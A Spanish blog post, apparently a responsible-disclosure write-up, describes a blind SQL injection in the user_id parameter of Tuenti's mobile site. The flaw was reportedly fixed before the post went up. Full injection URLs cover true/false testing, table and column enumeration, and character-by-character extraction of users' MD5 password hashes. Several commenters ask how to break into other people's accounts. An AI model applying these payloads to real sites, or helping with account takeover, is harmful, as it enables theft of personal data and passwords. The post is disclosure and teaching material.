Fallo de seguridad en Tuenti: SQL Injection que permite obtener datos de usuarios

Son numerosos los fallos que se han ido detectando en esta red social (no más de los que se encuentras en cualquier otra web del estilo). Normalmente son fallos de XSS pero esta vez he encontrado en la web de Tuenti la posibilidad de inyectar código SQL.

Este enorme fallo de seguridad permite extraer datos confidenciales de usuarios (nombre, apellidos, mail, tfno, password en MD5, …) de manera que voy a escribir a los técnicos de Tuenti y a esperar que esté todo solucionado antes de publicarlo en el blog.

… Ya he hablado con Ícaro Moyano, por cierto, una persona muy agradable, y han solucionado el problema … paso a comentarlo …

En todas las páginas que he visto se filtran los parámetros para evitar la introducción de SQL, pero he encontrado de casualidad un parámetro que no se verifica, y con el que se puede inyectar información. Es en la web móvil y el ataque se basa en el método true/false (blind SQL), es decir, se altera la sentencia SQL de forma que si se muestra la página quiere decir que se cumple la función escrita y si da error o no se muestra, quiere decir que no se cumple. Por ejemplo:

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+1=1&post_id=XXXXXXXX

el parámetro user_id es vulnerable ya que no verifica que sea el ID del usuario y puedo añadir código SQL detrás. En este caso he incluido una función lógica que siempre se cumple: AND 1=1 y por tanto me muestra la web sin problemas

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+1=0&post_id=XXXXXXXX

en este otro caso puse una condición que nunca se cumple, por tanto la web da error: AND 1=0

Mediante esto es posible extraer información, por ejemplo:

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+(select+count(*)+from+tabla_user)>0&post_id=XXXXXXXX

al no darme error, deduzco que existe una tabla llamada tabla_user. Del mismo modo puedo averiguar el nombre de las columnas:

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+
(
select+count(iduser)+from+tabla_user)>0&post_id=XXXXXXXX

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+
(
select+count(mailuser)+from+tabla_user)>0&post_id=XXXXXXXX

http://m.tuenti.com/?m=
profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+
(
select+count(nombreuser)+from+tabla_user)>0&post_id=XXXXXXXX
…..

Y una vez conocida la estructura de la tabla de usuarios puedo ir extrayendo los datos con un poco de paciencia (o con un pequeño script):

http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+
(
select+count(*)+from+tabla_user+where+iduser=XXXXXXXX+and+
substring(pwduser,1,1)>0x35)>0&post_id=XXXXXXXX

poco a poco puedo ir sacando cada uno de los caracteres que forman la contraseña de un usuario (en MD5), que luego, si no es una contraseña larga, es posible crackear en cuestión de poco tiempo. Sólo se trata de tener un poco de paciencia e ir sacando caracter a caracter hasta dar con los 32 que forman la contraseña … o implementar un pequeño script que en unos segundos te facilita los 32 caracteres de la contraseña en MD5.

NOTA: he cambiado los nombres de la tabla y columnas por otros inventados para no facilitar datos sensibles de Tuenti.

26 comentarios

  1. igual te crees qeu has descuvierto tu esta vul… no? era ya concida por mucha gente, asi que no te hagas el hacker

  2. Solo os quiero comentar una cosa que me dio por probar y fue algo bastante extraño,igual lo mencionais aqui y no me di cuenta,no llevo mucho tiempo en esto del»hack» la cosa es que decidi escribir esto en la barra de direcciones:
    http://m.tuenti.com/?m=profile&func=reply_to_wall_post&user_id=XXXXXXXX+and+1=1&post_id=XXXXXXXX

    que lo mencionais arriba(logicamente sustitui los XXX por numeros)la primera secuencia de XXX por el numero de usuario y la segunda puse un numero al azar,en mi caso el 54,y asi sin mas me salio un archivo m_tuenti_com para guardarle,le guarde y le abri con el bloc de notas,y aparece esto:

    Tuenti-EntrarEntrarE-mailContraseña Recordarme en este terminalRecordar contraseñaMás informaciónInicioAviso legal© 2009 Tuenti | Versión completa

    que es,se puede hacer algo con eso?

  3. Hola, me han robado mi contraseña y la han cambiado…
    he leido esto muchas veces pero no soy capaz de hacerme con la contraseña para poder recuperar mi tuenti….pepelux…tu podrias utilizar esto para devolverme la contraseña?

  4. Amigo anónimo.

    Estoy totalmente seguro de que antes de que yo me percartara de esa vulnerabilidad ya había mucho carroñero como tú robando datos. El que la descubriera no quiere decir que haya sido el primero, sino que la descubrí por mí mismo y no me la dijo nadie. Del mismo modo se que a tí te la habrá dicho a tí otro lamercillo como tú y no habrás sido tu el que la descubrió, porque alguien que no sabe apenas escribir, cómo va a controlar de SQL?

  5. buenas antes de nada felicitarte por tu pagina y por tus post me han servido de mucho pero tengo un pequeño problema, a parte que no tengo mucha idea me han robado mi cuenta de tuenti y he leido por post que utilizando el wfuzz o cain y abel puedo sacar la contraseña que ha puesto el …………… que me la ha robado es cierto??????. En caso de que no me puedes decir algun programa que sea capaz de decirme la contraseña y recuperar mis fotos y demas.

    muchas gracias eres un crack.

  6. Como se hace esto exactamente?? cuando pego los enlacen con el numero de usuario me sale para descargarme un archivo k no se cn que programa se abre. podria explicarmelo. muxisimas gracias

  7. No me he enterado de nada…. si alguien me puede decir como coger la contraseña a un tuenti, se lo agradeceria. 😀

  8. Hace tiempo que no me doy una vuelta por la red, no porque no quiera sino por motivos personales, es complejo y me llama mucho la atención como juntando tuenti + usuario + fallo + robo de contraseñas… la gente se anima a comentar y ademas comentar estupideces. Seguramente tu Jose lo hayas notado más, si llevas un control de visita te aumentarian jeje. Pero a lo que vamos es interesantisimo y más aun la actitud de no publicar nada asta el reporte con tuenti (que de echo todo el equipo de trabajo es impresionante y grandes profesionales que se preocupan por arreglar este tipo de fallos y no te mandan a la mierda y luego lo solucionan como si lo hubieran localizado ellos).

    Nose si el bug alguien lo encontro antes o no cosa que pongo en duda esto va para el señor anonimo. Porque si fuera asi el bom que pegaría en la red se notaría.

    Nada simplemente un trabajo impresionante. Toda esta parrafada de mierda!jeje se remite en una palabra FELICIDADES!

  9. Hola k0rde. Supongo que sí que habría gente aprovechándose de ese fallo antes de que yo lo viera. No es nada del otro mundo a pesar de que algunos se sientan superhackers porque un amigo se lo dijo y ellos sacan los datos de su vecina … sólo es cuestión de navegar, probar unas cuantas cosas y echarle tiempo.

    El caso es que efectivamente la gente de tuenti me ha demostrado ser muy profesional y abierta, pues no sería el primer fallo que reporto a un admin y este me dice con chulería que ellos no tienen ningún fallo y que me vaya un poco a la mierda.

    Un saludo 🙂

  10. Hola a todos, os escribo para deciros q en este momento existe un fallo en el tuenti ya q a un amigo se le ha metio la novia de otro en su tuenti xa ver los privados q se mandan, prueba de ello esq ella le ha enviado un correo con todos los privados comprometedores q tenia en comun con su amigo. esto se hizo ace 2 semanas x lo tanto es posible y me gustaria saber como lo ha exo para q mi amigo le pueda devolver la jugada. ALGUIEN SABE COMO HACERLO???

    saludos

  11. HHola a todos y pepelux, a ver tuenti creo que a capado la aplicacion de tuenti plus v13, mirarlo xq lanza un mensaje que dice que tuenti detecto un problema y no se puede entrar a traves de la interfax, mirar a ver que os dice a vosotros y comentar algo, ok? un saludo

  12. Por favor necesito tu ayuda y estoy hablando muy en serio, si sabes realmente conseguirla lo necesito, es por mi hija por favor agregame y muchas gracias

  13. Perdona, pero el TPlus en la última versión tiene un fallo al intentar: ver amigos de
    Siempre te salen los mismos, piques a quien piques y a la tercera te salen 540 amigos que no se quien coños son
    O sea amigo pepelux una cagadita
    Un saludo

  14. Disculpa si te ha molestado el comentario, pero es que el problema que te comento persiste, cuando le das a buscar amigos de, te salen 540
    y nunca los amigos de las personas que buscas.
    De todas formas gracias por tu aporte
    Un saludo
    Juanjo

  15. @juanjo: no me molesta el comentario .. es que ando un poco liado y no me da tiempo a contestar todos los mensajes … lo revisaré 🙂

  16. juas… lo cual… no existe ningun metodo retorcido para lograr cuentas ajenas tuenti u otros metodos alternativos?

    Xploits ya estan muy vistos… nadie cae en eso ya, al no ser que se sea muy inocente y no se desconozca el tema.

    Aun asi… creo que tiene que haber algun que otro metodo.. la red de internet no es tan segura como aparenta… o que opinas Pepelux?

  17. Bien, una respuesta correcta y sincera. Estoy totalmente de acuerdo. 😀 gracias por tu aporte.

    Sigue asi!!!

  18. Pepelux* he encontrado esta web por casualidad para buscar un fallo en tuenti. No soy un carroñero en busca de contraseñas de vecinos para espiar sus contactos o sms privados. Estoy elaborando exaustivos trabajos en contra del bullying y me encantaría poder estar en contacto con usted para que me ayudara en algunos aspectos informáticos. Para más información, me podría facilitar un mail, algo para poder hablar con usted de forma más exaustiva.gracias

Deja un comentario